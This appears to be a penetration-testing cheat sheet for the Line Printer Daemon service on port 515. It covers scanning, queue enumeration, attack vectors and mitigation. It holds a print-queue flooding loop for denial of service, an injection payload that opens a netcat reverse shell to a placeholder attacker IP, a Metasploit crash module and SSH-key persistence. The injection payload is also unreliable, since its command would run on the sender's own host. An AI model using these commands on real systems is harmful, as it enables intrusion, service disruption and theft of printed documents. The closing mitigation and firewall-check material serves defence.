Line Printer Daemon (LPD) - Port 515
Basic Info
Port Number: 515
Service: Line Printer Daemon (LPD)
Common Usage: LPD is a network printing protocol used to manage print jobs on UNIX and Linux systems. It allows remote computers to submit print jobs to a central print server.
Default State: Open on many older UNIX/Linux distributions, but often disabled in modern systems.
Security Concerns:
Lacks authentication, allowing unauthorized access if improperly configured.
Susceptible to command injection and buffer overflow attacks.
Can be used for denial-of-service (DoS) attacks by sending large or malformed print jobs.
Print job manipulation may allow sensitive document interception.
How to Connect
Manually Connecting to LPD
LPD listens on port 515 and operates by receiving print job commands. You can interact with it manually using netcat or telnet:
nc -v [Target-IP] 515
If the connection is successful, LPD is running and ready for further enumeration.
You can also check the /etc/printcap file (if accessible) to see available printers:
cat /etc/printcap
Reconnaissance (Recon)
Scanning for Port 515
Use Nmap to detect if the LPD service is running:
nmap -p 515 -sV -T4 [Target-IP]
Expected output:
515/tcp open printer Line Printer Daemon (LPD)
For a deeper scan using NSE scripts:
nmap --script=lpd-enum -p 515 [Target-IP]
This will attempt to enumerate available printers and configurations.
Enumeration
Checking Printer Queues
If LPD is running, you can list print queues using:
lpq -S [Target-IP]
If no authentication is required, this command may reveal active print jobs.
Enumerating Available Printers
Try checking the configuration of remote printers:
lpstat -v -h [Target-IP]
If a printer is misconfigured, it might allow arbitrary command execution.
Attack Vector
Anonymous Printing Abuse - If LPD is open and does not require authentication, an attacker can send unlimited print jobs, leading to resource exhaustion (Denial of Service).
Command Injection in Print Jobs - Certain LPD implementations allow escape sequences that can lead to remote code execution.
Directory Traversal - Some older LPD implementations allow path traversal, enabling an attacker to overwrite files outside the spool directory.
Print Job Interception - If an attacker gains access, they may be able to capture sensitive documents submitted for printing.
Exploitation
Exploiting Open Print Queue for DoS
Send a large number of print jobs to overwhelm the system:
for i in {1..1000}; do
echo "Fake print job $i" | lpr -S [Target-IP] -P [Printer-Name]
done
This fills the print queue, preventing legitimate users from printing.
Command Injection via LPD Escape Sequences
Some LPD services allow malicious escape sequences that execute shell commands. Try submitting a print job with a malicious payload:
echo -e "\033[31m$(nc -e /bin/sh [Attacker-IP] 4444)\033[0m" | lpr -S [Target-IP] -P [Printer-Name]
If successful, this opens a reverse shell on the target system.
Metasploit Exploit for LPD
Metasploit has modules that can exploit LPD misconfigurations:
use auxiliary/dos/lpd/lpd_crash
set RHOSTS [Target-IP]
exploit
This attempts to crash the LPD service.
Tools Used
Nmap - Scanning and service detection
LPQ / LPSTAT - Printer queue enumeration
Netcat (nc) - Manual interaction and exploitation
Hydra - Brute-force login attempts (if authentication is enabled)
Metasploit - LPD-specific exploits and auxiliary modules
Burp Suite - If a web-based printer management interface is available
Post-Exploitation
Privilege Escalation
If you gain access through LPD, check for SUID binaries to escalate privileges:
find / -perm -4000 -type f 2>/dev/null
Maintaining Access
To maintain persistence, add an SSH key to the target machine:
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
Extracting Sensitive Print Jobs
If access is gained, look for spool files that contain document data:
ls -lah /var/spool/lpd/
Print jobs often contain PII (Personally Identifiable Information) or sensitive corporate data.
Mitigation & Defense
To secure against LPD exploitation:
Disable LPD if not required:
systemctl stop lpd
systemctl disable lpd
Restrict access using firewall rules:
iptables -A INPUT -p tcp --dport 515 -s [Trusted-IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 515 -j DROP
Enforce authentication for print jobs and disable guest access.
Use modern alternatives like CUPS (Common Unix Printing System) with encrypted communication.
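The two iptables rules above are appended with -A, so they only take effect if no earlier rule in the chain already accepts the traffic. The check below is an added example, not part of the original page: it reads `iptables -S INPUT` output and reports whether TCP/515 is still reachable from any source. The function name lpd_exposure, the sample rule sets and the address 192.0.2.10 are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): does the INPUT chain really
# restrict TCP/515? Live use (as root): iptables -S INPUT | lpd_exposure
# Assumption: only rules whose matches are "-s", "-p tcp", "-m tcp" and
# "--dport 515" are evaluated; rules with other matches are skipped.
lpd_exposure() {
  awk '
    $1 == "-P" && $2 == "INPUT" { policy = $3; next }
    $1 != "-A" || $2 != "INPUT" || verdict != "" { next }
    {
      src = proto = port = target = ""; other = 0
      for (i = 3; i <= NF; i++) {
        if      ($i == "-s")      src    = $(++i)
        else if ($i == "-p")      proto  = $(++i)
        else if ($i == "--dport") port   = $(++i)
        else if ($i == "-j")      target = $(++i)
        else if ($i == "-m" && $(i+1) == "tcp") i++
        else if ($i == "--reject-with") i++
        else other = 1
      }
      if (other || (proto != "" && proto != "tcp")) next
      if (port != "" && port != "515") next
      if (target != "ACCEPT" && target != "DROP" && target != "REJECT") next
      # First rule matching any source decides; earlier -s ACCEPTs are the allow list.
      if (src == "" || src == "0.0.0.0/0") verdict = target
      else if (target == "ACCEPT") allow = (allow == "" ? "" : allow ",") src
    }
    END {
      if (verdict == "") verdict = (policy == "" ? "ACCEPT" : policy)
      if (verdict == "ACCEPT") print "EXPOSED"
      else print "RESTRICTED allow=" (allow == "" ? "none" : allow)
    }'
}

# Constructed rule sets in `iptables -S INPUT` format; 192.0.2.10 is a placeholder.
GOOD='-P INPUT ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -s 192.0.2.10/32 -p tcp -m tcp --dport 515 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 515 -j DROP'
# Same rules appended after a pre-existing broad ACCEPT: the DROP never fires.
SHADOWED='-P INPUT ACCEPT
-A INPUT -p tcp -j ACCEPT
-A INPUT -s 192.0.2.10/32 -p tcp -m tcp --dport 515 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 515 -j DROP'

printf '%s\n' "$GOOD"     | lpd_exposure
printf '%s\n' "$SHADOWED" | lpd_exposure
```

An EXPOSED verdict on a host that still runs LPD means the ACCEPT/DROP pair has to be inserted ahead of the broader rule rather than appended.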